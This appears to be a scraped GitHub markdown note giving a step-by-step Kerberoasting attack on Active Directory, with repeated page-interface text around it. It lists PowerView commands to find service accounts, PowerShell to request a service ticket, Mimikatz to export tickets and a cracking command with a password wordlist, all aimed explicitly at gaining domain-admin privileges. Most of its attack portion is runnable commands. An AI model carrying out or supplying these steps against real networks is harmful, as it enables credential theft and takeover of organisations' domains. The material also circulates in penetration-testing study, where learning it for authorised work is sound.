Kerberost

Methodology/Steps

First find all the SPN accounts

Select SPN of a domain admin since we doing privilege escalation

Set the SPN as the argumentlist value and create a new object ( request a TGS )

Export the all the tickets by mimikatz

Keep a note of the file name where the ticket is stored of that service

Crack the ticket

Find user accounts used as Service account

Get-NetUser -SPN
Get-NetUser -SPN -Verbose | select displayname,memberof

Request TGS

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/computer.domain.local"

Check if the TGS has been granted

klist

Export all the tickets

Copy the file name of the ticket you exported; In this case its the file path for MSSQLSvc

Invoke-Mimikatz -Command '"kerberos::list /export"'

tgsrepcrack

Request-SPNTicket with PowerView can be used for cracking with JTR

python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\2-40a10000-user1@MSSQLSvc~computer.domain.localDOMAIN.LOCAL.kirbi

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

1-Kerberost.md

1-Kerberost.md

Kerberost

Methodology/Steps

Find user accounts used as Service account

Request TGS

Check if the TGS has been granted

Export all the tickets

tgsrepcrack

Files

1-Kerberost.md

Latest commit

History

1-Kerberost.md

File metadata and controls

Kerberost

Methodology/Steps

Find user accounts used as Service account

Request TGS

Check if the TGS has been granted

Export all the tickets

tgsrepcrack